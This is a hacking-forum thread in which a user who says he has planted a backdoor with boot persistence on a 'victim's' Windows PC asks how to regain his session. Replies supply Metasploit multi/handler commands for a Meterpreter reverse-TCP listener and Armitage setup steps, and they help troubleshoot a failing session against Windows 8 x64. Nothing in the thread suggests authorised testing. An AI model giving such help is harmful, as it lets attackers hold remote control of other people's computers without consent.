Thanks in advance for reading...
Assume that I have installed a backdoor or installed boot persistence on the victim's Windows PC. So I will be able to reconnect even if the victim restarts his PC. But if I restart my PC or close the session, then how do I establish the session again? I mean I want to connect with the victim PC using the backdoor even if I shut down my PC and open it later... Is it possible?
14 Responses
Yes. Just recreate your listener in Metasploit. As long as persistence is working, it will connect back when the target computer is turned on.
Thank you very much for your answer... It's really helpful, thanks again... Are my commands right to recreate my listener?
#./msfconsole -q
#msf > use exploit/multi/handler
#msf exploit(handler) > set payload windows/meterpreter/reversetcp
payload => windows/meterpreter/reversetcp
#msf exploit(handler) > set lhost 192.168.1.123
lhost => 192.168.1.123
#msf exploit(handler) > set lport 4444
lport => 4444
#msf exploit(handler) > run
Or should I remove the 3rd (#set payload..) cmd?
Yeah no problem. You got it. Not sure if the payload is needed, though I still put it in.
Another thing to check out if you haven't yet is Armitage. Armitage is a GUI (Graphical user interface) version of Metasploit. Once you get the hang of it, it's a lot easier to use than Metasploit.
If you are running Kali 2.0 do the following to get Armitage up and running.
In a terminal type
msfupdate
apt-get install armitage
msfdb init
Then open Armitage. (It should be in the application list on the left.)
The bottom half of the program is your Metasploit terminal. The top half will give you a graphic of your target computers with all the options of things to do with it.
I think Armitage comes with Kali already.
It does. I say to do apt-get install Armitage to update it. Maybe it's not necessary, but it's just what I do personally.
Not very good with Aptitude, so I have always just used apt-get update. Would this work, or do the Kali repositories not have it?
Thanks sir, I am very grateful for your help, I will try Armitage. Thanks....
Sir, when I try the above commands it shows an error:
Started reverse TCP handler on 192.168.0.110:4444
* Starting the payload handler...
* Sending stage (1188911 bytes) to 192.168.0.108
Sending stage (1188911 bytes) to 192.168.0.108
Sending stage (1188911 bytes) to 192.168.0.108
Sending stage (1188911 bytes) to 192.168.0.108
Can you tell me why, and any solution?
(Note: I am trying to exploit Windows 8 x64 bit.)
Type show options. Copy and paste the results here.
Then I have to apply force to stop it....
Your image says the payload is Windows/x64/shell/reversetcp. Did you mean for it to be that? If you meant to do the Meterpreter payload, type set payload windows/meterpreter/reversetcp
Be sure to have the underscore between reverse and tcp, this post edits it out.
Should I always wait online until the victim opens the payload?
If I'm not mistaken, I think Netcat could also be used for this by just listening to the specific port. I may be wrong.
Edit: I think this is just for normal shells, not Meterpreters.
Thanks, I will try again and do as you say sir, thanks for your reply........